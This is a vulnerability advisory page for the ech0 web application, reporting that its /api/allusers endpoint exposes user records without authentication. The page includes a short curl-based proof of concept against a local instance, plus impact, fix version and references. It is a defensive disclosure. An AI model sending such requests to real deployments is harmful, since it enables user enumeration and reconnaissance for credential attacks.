logo

Database

Improper authorization control for web services In github.com/lin-snow/ech0

Description

Ech0 authenticated user-list exposed data via public /api/allusers endpoint

Summary

GET /api/allusers is mounted as a public endpoint and returns user records without authentication. This allows remote unauthenticated user enumeration and exposure of user profile metadata.

Details

The route is registered under public routes:

    internal/router/user.go:17

      appRouterGroup.PublicRouterGroup.GET("/allusers", h.UserHandler.GetAllUsers())

The handler itself is documented as requiring authentication:

    internal/handler/user/user.go:177-185

      API docs/annotations indicate auth requirement (@Security ApiKeyAuth).

PoC

1) Negative control: endpoint that should require auth

Request:

curl -i "http://localhost:6277/api/user"

Response:

HTTP/1.1 401 Unauthorized
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE, PATCH, PUT
Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-Type
Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0
Content-Language: zh-CN
Content-Type: application/json; charset=utf-8
Expires: 0...

2) Trigger: call public user-list endpoint without auth

Request:

curl -i "http://localhost:6277/api/allusers"

Response:

HTTP/1.1 200 OK
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE, PATCH, PUT
Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-Type
Content-Language: zh-CN
Content-Type: application/json; charset=utf-8
Date: Sun, 22 Mar 2026 07:21:56 GMT
Content-Length: 912...

Impact

Vulnerability type: Access control bypass / unauthenticated data exposure.
Who is impacted: Any deployment exposing the API to untrusted networks, and all users whose profile metadata can be enumerated.
Business/security impact: Enables account reconnaissance and targeted credential attacks.

A fix is available at https://github.com/lin-snow/Ech0/releases/tag/v4.2.0.

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions

Aliases

1. CVE-2026-336382. NVD-2026-336383. OSV-2026-336384. GHSA-m983-7426-5hrj5. GCVE-2026-33638

References

1. https://github.com/lin-snow/Ech0/security/advisories/GHSA-m983-7426-5hrj2. https://github.com/lin-snow/Ech0/commit/acbf1fd71011e6b9e1e6a911128056a19862f6813. https://github.com/lin-snow/Ech0/releases/tag/v4.2.0

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.